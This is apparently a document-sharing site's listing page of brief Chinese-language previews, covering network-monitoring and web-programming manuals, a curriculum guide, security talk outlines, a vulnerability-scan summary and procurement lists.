SiteView技术白皮书 SiteView ECC V6.2 技 术 白 皮 书 游 龙 网 络 科 技 ( 中 国 ) 有 限 公 司 DragonFlow Networks(China),Inc. 目 录 第 一 章 产 品 概 述... 3 第 二 章 系 统 结 构... 6 一 系 统 架 构... 7 1 用 户 管 理 模 块... 7 2 Web Server... 8 3 存 储 加 密 模 块... 8

More information

天津天狮学院关于修订2014级本科培养方案的指导意见

天津天狮学院关于修订2014级本科培养方案的指导意见 目 录 天 津 天 狮 院 关 于 修 订 2014 级 本 科 培 养 方 案 的 指 导 意 见...1 金 融 类 专 业...9 金 融 专 业 培 养 方 案...9 保 险 专 业 培 养 方 案...14 人 力 资 源 管 理 专 业 培 养 方 案...19 劳 动 与 社 会 保 障 专 业 培 养 方 案...24 工 商 管 理 类 专 业...29 市 场 营 销 专 业

More information

超連結 03 URI (Universal Resource Identifier) URI Web URL (Universal Resource Locator) URI URI :// [: ]/ [/ 2...]/

超連結 03 URI (Universal Resource Identifier) URI Web URL (Universal Resource Locator) URI URI :// [: ]/ [/ 2...]/ 網頁程式設計 3-1 URI 的類型... 超連結 (hyperlink) Web 1 1 2 按一下圖片超連結開啟所連結的網頁 2 3-2 超連結 03 URI (Universal Resource Identifier) URI Web URL (Universal Resource Locator) URI URI :// [: ]/ [/ 2...]/ http://www.lucky.com.tw:100/books/index.htm

More information

内 容 协 作 平 台 TRS WCM 6.5 北 京 拓 尔 思 信 息 技 术 股 份 有 限 公 司 Beijing TRS Information Technology Co., Ltd 版 权 说 明 本 手 册 由 北 京 拓 尔 思 信 息 技 术 股 份 有 限 公 司 ( 以 下 简 称 TRS 公 司 ) 出 版, 版 权 属 TRS 公 司 所 有 未 经 出 版 者 正 式

More information

主程式 : public class Main3Activity extends AppCompatActivity { ListView listview; // 先整理資料來源,listitem.xml 需要傳入三種資料 : 圖片 狗狗名字 狗狗生日 // 狗狗圖片 int[] pic =new

主程式 : public class Main3Activity extends AppCompatActivity { ListView listview; // 先整理資料來源,listitem.xml 需要傳入三種資料 : 圖片 狗狗名字 狗狗生日 // 狗狗圖片 int[] pic =new ListView 自訂排版 主程式 : public class Main3Activity extends AppCompatActivity { ListView listview; // 先整理資料來源,listitem.xml 需要傳入三種資料 : 圖片 狗狗名字 狗狗生日 // 狗狗圖片 int[] pic =new int[]{r.drawable.dog1, R.drawable.dog2,

More information

untitled

untitled PowerBuilder Tips 利 PB11 Web Service 年度 2 PB Tips PB9 EAServer 5 web service PB9 EAServer 5 了 便 web service 來說 PB9 web service 力 9 PB11 release PB11 web service 力更 令.NET web service PB NVO 論 不 PB 來說 說

More information

Microsoft Word - SPEC-20130418

Microsoft Word - SPEC-20130418 ( 初 稿 2013.04.18) 中 央 研 究 院 經 濟 研 究 所 全 球 資 訊 網 站 改 版 建 置 案 建 議 書 徵 求 說 明 文 件 目 次 壹 專 案 概 述... 2 一 專 案 名 稱... 2 二 專 案 目 標... 2 三 專 案 範 圍... 2 四 專 案 時 程... 2 五 現 況 說 明... 3 貳 專 案 需 求... 3 一 網 站 軟 體 開 發

More information

目錄

目錄 資 訊 素 養 線 上 教 材 單 元 五 資 料 庫 概 論 及 Access 5.1 資 料 庫 概 論 5.1.1 為 什 麼 需 要 資 料 庫? 日 常 生 活 裡 我 們 常 常 需 要 記 錄 一 些 事 物, 以 便 有 朝 一 日 所 記 錄 的 事 物 能 夠 派 得 上 用 場 我 們 能 藉 由 記 錄 每 天 的 生 活 開 銷, 就 可 以 在 每 個 月 的 月 底 知

More information

Chapter V.S. PC

Chapter V.S. PC Chapter 14 14-1 V.S. PC 14-2 14-3 14-4 14-1 V.S. PC PC PC Yahoo! PC (https://tw.yahoo.com/) Yahoo! (https:// tw.mobi.yahoo.com/) Yahoo! a b a PC b PC PC Flash HTML5 CSS3 PC 14-2 14-3 PC PC Yahoo! PC https://tw.yahoo.com/

More information

PowerBuilder 8開發技術講座_3_.PDF

PowerBuilder 8開發技術講座_3_.PDF PowerBuilder 8 (3) PowerBuilder 8 PowerBuilder 8 Web HTML PowerBuilder client ActiveX client Java client ASP PowerDynamo PowerBuilder 8 PowerSite PowerBuilder 8 Dynamo Web Site Web Target PowerDynamo PowerDynamo

More information

漫步雲端 危機四起 雲端下的安全問題

漫步雲端    危機四起 雲端下的安全問題 漫步雲端 危機四起 雲端下的安全問題 個資在哪? 資訊漏洞與攻擊就在哪? Benny 大綱 漫步雲端應用 ~ 無紙化作業 雲端互動安全問題 ( 系統面 & 人際互動 ) 系統面安全問題 系統平台功能應用 人際互動安全問題 社交工程手法 系統入侵實錄 隨時動動手指即拿下網站 ( 滑鼠版 & 手機版 ) 躲貓貓入侵攻擊 ( 行動設備 ) 如何追蹤入侵來源 駭客留下什麼蛛絲馬跡 利用網路人肉搜尋 駭客哇!

More information

<4D6963726F736F667420576F7264202D2077656273616C6573ABC8A4E1A8CFA5CEBBA1A9FAAED1>

<4D6963726F736F667420576F7264202D2077656273616C6573ABC8A4E1A8CFA5CEBBA1A9FAAED1> WebSales 網 站 推 銷 員 客 戶 使 用 手 冊 最 好 的 輔 助 工 具, 尚 須 勤 於 操 作 與 檢 討, 適 時 修 正 方 向, 才 能 使 您 的 網 站 獲 得 最 大 效 益 目 錄 註 冊 與 新 手 快 速 指 引 1 功 能 介 紹 增 加 業 務 客 服 人 員 2 歡 迎 詞 設 定 4 自 訂 樣 式 與 位 置, 自 動 產 生 HTML 網 頁 原 始

More information

IE10 WorkShop

IE10 WorkShop 沈志豪 Patrick 技術支援副理台灣微軟 Separation of Explorer 7 from the Windows shell http://support.microsoft.com/kb/928675/en-us IE10+ 標準模式下, 開始不支援 Conditional Comments

More information

Professional Ajax Ajax Adaptive Path, LLC Jesse James Garrett Ajax php Garrett WebG

Professional Ajax Ajax Adaptive Path, LLC Jesse James Garrett Ajax   php Garrett WebG 1 何謂 Ajax? 2001 2005World Wide Web Web Google Google Google Labhttp:// labs.google.com Google LabGoogle Suggest Google Maps JavaScript remotingweb Professional Ajax Ajax 2005 2Adaptive Path, LLC Jesse

More information

互動網頁技術系列課程 HTML與CSS網站基礎設計 [12pt]

互動網頁技術系列課程 HTML與CSS網站基礎設計 [12pt] HTML CSS / 2011 HTML CSS 1/ 47 1 2 HTML 3 4 HTML 5 5 : CSS 6 CSS 7 HTML CSS 2/ 47 HTML CSS 3/ 47 ( BOM) UTF-8 Notepad++ (Winodws), Fraise/Smultron (Mac), VIM ( ) HTML CSS 4/ 47 UTF-8? UTF-8 (unicode),

More information

Asprain论坛的特色

Asprain论坛的特色 第 一 章 Asprain 论 坛 的 特 色 asprain 论 坛 是 一 个 适 合 于 各 中 小 学 中 专 技 校 职 高 建 设 校 园 论 坛 师 生 交 流 论 坛, 一 些 教 科 研 部 门 公 司 企 业 建 设 内 部 论 坛 IT 技 术 爱 好 者 建 设 技 术 交 流 论 坛 的 免 费 论 坛 程 序 它 有 两 个 版 本, 分 别 是 asp+access 版

More information

(Microsoft Word - wes _\246p\246\363\250\317\245\316LED\277O\305\343\245\334\252\254\272A.doc)

(Microsoft Word - wes _\246p\246\363\250\317\245\316LED\277O\305\343\245\334\252\254\272A.doc) 作者 Amber 版本 1.0.0 日期 2012/04/25 頁數 1/7 如何使用 LED 燈顯示狀態? 適用於 : 平台 作業系統版本 XPAC utility 版本 XP-8000 系列 N/A N/A XP-8000-Atom 系列 WES2009 所有版本 N/A: Not applicable to this platform and OS. 注意! 欲變更系統的任何設定之前, 請先關閉

More information

软 件 工 程 专 业 习 指 南 目 录 一 软 件 工 程 专 业 设 置 背 景 与 发 展 前 景... 3 二 软 件 工 程 专 业 实 践 教 条 件... 4 三 软 件 工 程 专 业 课 程 类 型 及 核 方 式... 6 1. 软 件 工 程 专 业 课 程 类 型...7

软 件 工 程 专 业 习 指 南 目 录 一 软 件 工 程 专 业 设 置 背 景 与 发 展 前 景... 3 二 软 件 工 程 专 业 实 践 教 条 件... 4 三 软 件 工 程 专 业 课 程 类 型 及 核 方 式... 6 1. 软 件 工 程 专 业 课 程 类 型...7 计 算 机 系 软 件 工 程 专 业 习 指 南 广 东 科 技 院 计 算 机 系 2015-9-1 软 件 工 程 专 业 习 指 南 目 录 一 软 件 工 程 专 业 设 置 背 景 与 发 展 前 景... 3 二 软 件 工 程 专 业 实 践 教 条 件... 4 三 软 件 工 程 专 业 课 程 类 型 及 核 方 式... 6 1. 软 件 工 程 专 业 课 程 类 型...7

More information

Microsoft Word - cr_xi_supported_platforms_tw.doc

Microsoft Word - cr_xi_supported_platforms_tw.doc Crystal Reports XI 支援平台 ====================================== (c) 2004 Business Objects XI 發佈時的一般可用時期支援這些平台 如需 XI 平台支援最新版本的資訊, 請參閱 :http://www.businessobjects.com/support/ 語言 ========= * 英文 * 法文 * 德文

More information

Marketing_WhitePaper.PDF

Marketing_WhitePaper.PDF Turbolinux PowerMonitor Enterprise 1. 1994 WWW WEB 1 Web 1: Web Web web web web web web Web HTML 2 DNS Web DB LDAP Shipping Agencies 2 2 CGI Servlets JSP ASP XSL JDBC Web 2. HP OpenView CA Unicenter Tivoli

More information

The Applicibility of Google Maps/Earth and Urmap API to Real Estate Database* Jin-Tsong Hwang** Abstract Whether the real estate market is prosperous

The Applicibility of Google Maps/Earth and Urmap API to Real Estate Database* Jin-Tsong Hwang** Abstract Whether the real estate market is prosperous 53 73 Journal of Taiwan Land Research Vol. 9, No.2 pp. 53~73 Google Maps/Earth Urmap API * ** 95 4 7 95 7 4 摘 要 ASP Google Maps/Earth Urmap API * ** E-mail jthwang@mail.ntpu.edu.tw 53 The Applicibility

More information

( )... 5 ( ) ( )

( )... 5 ( ) ( ) 2016 大學校院招收大陸地區學生聯合招生委員會 71005 臺南市永康區南臺街 1 號 E-mail:rusen@stust.edu.tw WEB:http://rusen.stust.edu.tw TEL:+886-6-2435163 FAX:+886-6-2435165 2 0 1 6 0 1 1 9 2016... 2... 3... 5 ( )... 5 ( )... 5 1... 6 2...

More information

IIS Web FTP

IIS Web FTP 1... 1 1... 1 2... 1 3... 2 6 C/S... 2 4... 4 7... 5 8... 5 9... 6 10 Web... 7 11 CORBA... 8 12... 8 2... 9 1... 9 2... 9 3... 10 4 BSP Business System Planning... 11 5... 13 6... 15 7... 15 8... 16 9...

More information

2 3 13 17 22 26 1 2 8 100738 +86 (10) 8508 5000 +86 (10) 8518 5111 www.kpmg.com.cn 2006 4 2002 2006 1 28% 2006 17 8 500 2006 2006 2006 7 2.5 2 1 500 500 40% 500 10 16 14 12 10 8 6 4 2 2002-2006 5.1 5.9

More information

软件概述

软件概述 Cobra DocGuard BEIJING E-SAFENET SCIENCE & TECHNOLOGY CO.,LTD. 2003 3 20 35 1002 010-82332490 http://www.esafenet.com Cobra DocGuard White Book 1 1....4 1.1...4 1.2 CDG...4 1.3 CDG...4 1.4 CDG...5 1.5

More information

温州市政府分散采购

温州市政府分散采购 温 州 市 政 府 分 散 采 购 招 标 文 件 招 标 编 号 :F - G B 2 0 1 6 0 3 1 4 0 0 4 7 招 标 项 目 : 温 州 市 人 民 政 府 办 公 室 政 务 云 平 台 ( 重 ) 招 标 方 式 : 公 开 招 标 招 标 人 : 温 州 市 人 民 政 府 办 公 室 招 标 代 理 : 二 〇 一 六 年 三 月 目 录 投 标 保 证 金 办 理

More information

安全公告

安全公告 信 息 安 全 漏 洞 威 胁 通 报 第 1 页 共 100 页 信 息 安 全 漏 洞 威 胁 通 报 安 恒 信 息 信 息 安 全 漏 洞 威 胁 通 报 2015 年 06 月 04 日 -2015 年 06 月 11 日 6 月 第 2 周 根 据 中 国 国 家 信 息 安 全 漏 洞 库 统 计, 本 周 共 收 集 整 理 信 息 安 全 漏 洞 112 个, 其 中 高 危 漏

More information

Autodesk Product Design Suite Standard 系統統需求 典型使用用者和工作流程 Autodesk Product Design Suite Standard 版本為為負責建立非凡凡產品的設計師師和工程師, 提供基本概念設計計和製圖工具, 以取得令人驚驚嘆

Autodesk Product Design Suite Standard 系統統需求 典型使用用者和工作流程 Autodesk Product Design Suite Standard 版本為為負責建立非凡凡產品的設計師師和工程師, 提供基本概念設計計和製圖工具, 以取得令人驚驚嘆 Autodesk Product Design Suite Standard 20122 系統統需求 典型使用用者和工作流程 Autodesk Product Design Suite Standard 版本為為負責建立非凡凡產品的設計師師和工程師, 提供基本概念設計計和製圖工具, 以取得令人驚驚嘆的產品設計計 Autodesk Product Design Suite Standard 版本中中包括以下軟體體產品

More information

摘 要 在 這 忙 碌 的 社 會 中, 普 遍 人 們 運 動 時 間 其 實 並 不 充 裕, 體 力 越 來 越 差 的 情 況 下 還 隨 意 飲 食 導 致 身 體 健 康 越 來 越 差, 因 此 本 專 題 打 算 利 用 健 康 飲 食 的 方 式 改 善 這 些 人 的 體 質,

摘 要 在 這 忙 碌 的 社 會 中, 普 遍 人 們 運 動 時 間 其 實 並 不 充 裕, 體 力 越 來 越 差 的 情 況 下 還 隨 意 飲 食 導 致 身 體 健 康 越 來 越 差, 因 此 本 專 題 打 算 利 用 健 康 飲 食 的 方 式 改 善 這 些 人 的 體 質, 元 培 科 技 大 學 資 訊 管 理 系 畢 業 專 題 健 康 飲 食 網 站 計 畫 書 指 導 老 師 : 林 侑 賢 老 師 組 員 : 陳 佑 伊 (971408067) 張 祥 庭 (971408084) 黃 聖 哲 (971408098) 劉 潤 婷 (971408106) 中 華 民 國 一 百 年 十 二 月 摘 要 在 這 忙 碌 的 社 會 中, 普 遍 人 們 運 動 時

More information

QVM330 多阜寬頻路由器

QVM330 多阜寬頻路由器 俠 諾 神 捕 QnoSniff 專 業 版 2.0 繁 體 中 文 使 用 手 冊 目 錄 一 簡 介... 4 二 QnoSniff 專 業 版 系 統 安 裝 與 配 置... 6 2.1 開 始 之 前 的 準 備... 6 2.2 QnoSniff 專 業 版 安 裝 過 程 中 所 需 元 件... 6 2.3 佈 署 連 接 範 例 拓 樸... 7 2.4 開 始 安 裝... 7

More information

ansoft_setup21.doc

ansoft_setup21.doc Cadence Cadence Cadence 1000 (1) (2) CIC (3).. CIC Cadence (a) CIC license license server license CIC license CIC license (b) 2000 Cadence license 92 1 1 license server CIC 92 1 1 Cadence license licenser

More information

TopTest_Adminstrator.doc

TopTest_Adminstrator.doc 壹 前 言... 3 貳 系 統 簡 介... 4 一 TKB multimedia Top-Test 系 統 架 構...4 1. 使 用 者 介 面 層 (Presentation tier)...5 2. 商 業 邏 輯 層 (business logic tier)...5 3. 資 料 服 務 層 (data services tier)...5 二 TKB Multimedia Top-Test

More information

網站安全

網站安全 2 3 4 5 6 7 8 9 : 10 ( ) E-mail rdec@rdec.gov.tw 11 (PATCH) 12 ( ) 13 cookie 14 1. 2. 3. 4. 15 cookie Cookie Netscape IE Internet cookie cookie cookie cookie 16 MS Internet Explorer 6.x-> -> 17 cookie

More information

1. 概 述 1.1 扫 描 对 象 序 号 1 IP 地 址 域 名 1.2 漏 洞 等 级 分 布 风 险 类 型 数 量 高 风 险 1 中 风 险 5 低 风 险 4 信 息 类 4 7% 29% 高 风 险 36% 中 风 险 低 风

1. 概 述 1.1 扫 描 对 象 序 号 1 IP 地 址 域 名  1.2 漏 洞 等 级 分 布 风 险 类 型 数 量 高 风 险 1 中 风 险 5 低 风 险 4 信 息 类 4 7% 29% 高 风 险 36% 中 风 险 低 风 网 站 安 全 扫 描 报 告 http://wjw.changning.sh.cn 漏 洞 扫 描 报 告 上 海 三 零 卫 士 信 息 安 全 有 限 公 司 1 1. 概 述 1.1 扫 描 对 象 序 号 1 IP 地 址 域 名 http://wjw.changning.sh.cn 1.2 漏 洞 等 级 分 布 风 险 类 型 数 量 高 风 险 1 中 风 险 5 低 风 险 4 信

More information

RUN_PC連載_10_.doc

RUN_PC連載_10_.doc PowerBuilder 8 (10) Jaguar CTS ASP Jaguar CTS PowerDynamo Jaguar CTS Microsoft ASP (Active Server Pages) ASP Jaguar CTS ASP Jaguar CTS ASP Jaguar CTS ASP Jaguar CTS ASP Jaguar CTS ASP Jaguar Server ASP

More information

專業式報告

專業式報告 IP Kamera 9060A-SL IP Kamera 9060A-SL : V1.00 : 2006.04 IP KAMERA 9000(A) 說 FCC CE 1.IP Kamera 9060A-SL 2.IP Kemera 9060A-SL 3. 4. 9060A-SL 5. 9060A-SL - 1 - 1....3... 2....4 9060A-SL...... 3....5 4....6......

More information

價規一覽表 仁銓契約編號 : _275 區別 : 臺北市 新北市 桃園市 新竹縣 ( 市 ) 臺中市契約期間 :108/03/26~109/03/25 軟體標契約價是含稅 5% 與 IDB 服務費 1.5% 經濟部工業局 108 年第一次電腦軟體共同供應契約採購案號 _

價規一覽表 仁銓契約編號 : _275 區別 : 臺北市 新北市 桃園市 新竹縣 ( 市 ) 臺中市契約期間 :108/03/26~109/03/25 軟體標契約價是含稅 5% 與 IDB 服務費 1.5% 經濟部工業局 108 年第一次電腦軟體共同供應契約採購案號 _ 12 6 Citrix Virtual Apps Advanced Edition (CCU) 含 1 年 Customer Success Services Citrix Systems 5-100 NT$24,664 12 7 Citrix Virtual Apps Premium Edition (CCU) 含 1 年 Customer Success Services Citrix Systems

More information

10-2 SCJP SCJD 10.1 昇陽認證 Java 系統開發工程師 的認證程序 Java IT SCJD

10-2 SCJP SCJD 10.1 昇陽認證 Java 系統開發工程師 的認證程序 Java IT SCJD 10 SCJD 簡介 Java 10-2 SCJP SCJD 10.1 昇陽認證 Java 系統開發工程師 的認證程序 Java IT SCJD 10 SCJD 10-3 Java Java SCJD 7 Swing RMI 10.1.1 The Assignment The Essay 9 10 10-4 SCJP SCJD 90 10.1.2 SCJP Java 90 120 Swing 10

More information

6-1 Table Column Data Type Row Record 1. DBMS 2. DBMS MySQL Microsoft Access SQL Server Oracle 3. ODBC SQL 1. Structured Query Language 2. IBM

6-1 Table Column Data Type Row Record 1. DBMS 2. DBMS MySQL Microsoft Access SQL Server Oracle 3. ODBC SQL 1. Structured Query Language 2. IBM CHAPTER 6 SQL SQL SQL 6-1 Table Column Data Type Row Record 1. DBMS 2. DBMS MySQL Microsoft Access SQL Server Oracle 3. ODBC SQL 1. Structured Query Language 2. IBM 3. 1986 10 ANSI SQL ANSI X3. 135-1986

More information

QVM330 多阜寬頻路由器

QVM330 多阜寬頻路由器 侠 诺 神 捕 QnoSniff 专 业 版 2.0 简 体 中 文 使 用 手 册 目 录 一 简 介... 4 二 QnoSniff 专 业 版 系 统 安 装 与 配 置... 5 2.1 开 始 之 前 的 准 备... 5 2.2 QnoSniff 专 业 版 安 装 过 程 中 所 需 组 件... 5 2.3 布 署 连 接 范 例 拓 朴... 6 2.4 开 始 安 装... 6

More information

Microsoft PowerPoint - SAGE 2010

Microsoft PowerPoint - SAGE 2010 SAGE Journals Online -Communication Studies 大綱 SAGE 簡介 Communication Studies 收錄內容 SJO 平台功能介紹 首頁 瀏覽功能 檢索功能 進階服務 SAGE Content 超過 520 種人文 社會科學 理工 科技領域電子期刊 SAGE 與超過 245 個國際知名的學會合作 ( 包括 American Sociological

More information

網路設備決標一覽表.xls

網路設備決標一覽表.xls 1 入侵偵測防禦系統之 100Mbps( 支援 IPv6) StoneSoft IPS-1030 181,237 芬蘭 2 入侵偵測防禦系統之 100Mbps( 含加值服務選項功能 )( 支援 IPv6) FORTINET FG-200B-IPS+FB-2001+FAZ-100C / 加拿大 / HP S110 / JC186A SonicWALL NSA 3500(NSA 3500+01-SSC-3500-

More information

Windows 10 在數位轉型下 所扮演的重要角色暨安全功能介紹

Windows 10 在數位轉型下 所扮演的重要角色暨安全功能介紹 台灣微軟技術支援部技術支援經理 沈志豪 1 Agenda IE 提供的相容性功能 調整文件模式 (Document Mode) 調整瀏覽器模式 (Browser Mode) 使用者代理程式字串 (User Agent) 如何讓 IE11 自動化套用適當的文件模式 Meta Tag 相容性檢視 (Compatibility View) 企業模式 (Enterprise Mode) 5.1 v2 相容性問題排除策略

More information

基于UML建模的管理管理信息系统项目案例导航——VB篇

基于UML建模的管理管理信息系统项目案例导航——VB篇 PowerBuilder 8.0 PowerBuilder 8.0 12 PowerBuilder 8.0 PowerScript PowerBuilder CIP PowerBuilder 8.0 /. 2004 21 ISBN 7-03-014600-X.P.. -,PowerBuilder 8.0 - -.TP311.56 CIP 2004 117494 / / 16 100717 http://www.sciencep.com

More information

Microsoft Word - 全華Ch4Ans.doc

Microsoft Word - 全華Ch4Ans.doc 得 分 : 101 學 年 度 第 2 學 期 全 華 Ch4 命 題 教 師 : 範 圍 : 年 班 號 姓 名 一 單 選 題 : (3) 1. 下 列 有 關 開 放 格 式 檔 案 的 檔 案 性 質 對 應, 何 者 有 誤? (1)gif: 圖 形 檔 (2)avi: 視 訊 檔 (3)odt: 簡 報 檔 (4)xlsx: 電 子 試 算 表 檔 ( 出 處 :4-3) 解 析 odt

More information

A-2 l 跨裝置網頁設計 A-1 <frameset> <frame> <noframes> (frame) HTML (navigation bar)

A-2 l 跨裝置網頁設計 A-1 <frameset> <frame> <noframes> (frame) HTML (navigation bar) AppendixA HTML A-1 A-2 A-3 A-2 l 跨裝置網頁設計 A-1 (frame) HTML (navigation bar) HTML 框架元素 l A-3 1. 2. 3. 4.

More information

Internet Explorer 10

Internet Explorer 10 Internet Explorer 10 Windows Internet Explorer 10 Internet Explorer 10 Internet Explorer 10 Windows Windows 8 Internet Explorer 10 Windows Internet Explorer 10 Modern Desktop Windows 8 Internet Explorer

More information

吉安人事招聘网2012年江西省面向村干部招考300名公务员(2013年1月13日

吉安人事招聘网2012年江西省面向村干部招考300名公务员(2013年1月13日 吉 安 人 事 招 聘 网 2012 年 江 西 省 面 向 村 干 部 招 考 300 名 公 务 员 (20 1 月 13 日 www.hmkpk.com http://www.hmkpk.com 吉 安 人 事 招 聘 网 2012 年 江 西 省 面 向 村 干 部 招 考 300 名 公 务 员 (2013 年 1 月 13 日 为 从 基 层 和 临 盆 一 线 选 拔 出 色 群 众

More information

untitled

untitled 21 Visual FoxPro Visual FoxPro 6.0 11 Visual FoxPro Visual FoxPro CIP Visual FoxPro 2004 21 ISBN 7-03-014834-7 V Visual FoxPro TP311.138 CIP 2004 143035 16 100717 http://www.sciencep.com * 2004 12 7871092

More information

SEC-220

SEC-220 Session CERT/CC 60000 50000 40000 52,658 30000 26,829 20000 10000 0 2,412 1995 1999 2000 2001 Q1, 2002 Source: http://www.cert.org/stats/ CERT/CC 3000 2500 2000 2,437 1500 1000 500 0 171 1,065 1995

More information